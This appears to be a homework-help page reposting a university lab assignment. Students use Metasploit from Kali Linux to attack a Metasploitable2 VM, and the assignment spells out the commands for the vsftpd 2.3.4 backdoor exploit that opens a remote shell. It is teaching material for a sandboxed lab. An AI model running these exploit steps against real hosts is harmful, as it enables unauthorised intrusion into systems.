Question
In this assignment, you'll need 2 virtual machines (VMs) installed, configured, and communicating on your computer: the Attack VM (Kali Linux) and a Target VM
In this assignment, you'll need 2 virtual machines ("VMs") installed, configured, and communicating on your computer: the Attack VM (Kali Linux) and a Target VM (Metasploitable2) that we configured in the previous assignment.
Additionally, this assignment requires research into how to use our tool, Metasploit. You will need to determine what the target's vulnerabilities are, and then how to exploit them.
NOTE: We are a team, so make sure you post questions and comments to the "Questions" forum, "Assignments 8 and 9" thread. I encourage you to help each other as much as possible: just don't provide any specific commands, answers, or code in your posts. If you are still having issues, email me directly.
Also: Please be sure your computer meets minimum requirements listed in the syllabus, including root/admin access and hard drive space. If necessary, cloud-based solutions are also an option (e.g. Azure or Amazon Web Services) at your expense and with your own expertise.
Oh yes, DO NOT TARGET ANY HOSTS OTHER THAN YOUR TARGET VM. It would probably be illegal, and we like to keep ITS on friendly terms.
Please perform the below actions and submit descriptions and screenshots of your results in a single .pdf file uploaded here.
Happy Hacking!
1. Verify network connectivity again between your Attack VM and the Target VM and note the Target IP Address
2. In your Attack VM, launch 'metasploit' to attack the Target VM.
3. Perform an attack on the FTP service found by NMAP:
All commands are disignated with '...'
'search vsftp' - This will give us a list of exploits with "vsftp" in the name
'use exploit/unix/ftp/vsftpd_234_backdoor' - this will load this exploit
'set RHOST
'exploit' - this fires our exploit
A command shell on the Target VM will open on the Attack VM
'hostname' - this will show the context of the shell
'whoami' -this will show the logged on user of the shell
For further reading: http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
4. Based on the NMAP results, research another vulnerability and exploit, then perform it.
NOTE: this will be the bulk of your score for this assignment.
You will have to research on the Internet what exploits to use to attack the Target VM, but luckily there are many involving vulnerabilities in nfs, samba, php, java, etc. Execute the following commands/steps and submit. See your NMAP results from Assignment 8.0, or run NMAP again.
https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/
https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf
Results to submit - Please submit screenshots with descriptions of the following to Blackboard as a single .pdf file.
Pings between Attack and Target
Screenshot of the 'hostname" and ' whoami' command results from known attack in step 3
Description of chosen exploit and of screenshots of the results in step 4. The results should show evidence that the exploit was successful e.g. showing the computer name and user account in step 3.
Further help:
https://www.hackthis.co.uk/articles/a-beginners-guide-to-metasploit
https://www.youtube.com/watch?v=gWKyFYMY_Pk
https://www.youtube.com/watch?v=cnkLv_RE3EI
Step by Step Solution
There are 3 Steps involved in it
Step: 1
Get Instant Access to Expert-Tailored Solutions
See step-by-step solutions with expert insights and AI powered tools for academic success
Step: 2
Step: 3
Ace Your Homework with AI
Get the answers you need in no time with our AI-driven, step-by-step assistance
Get Started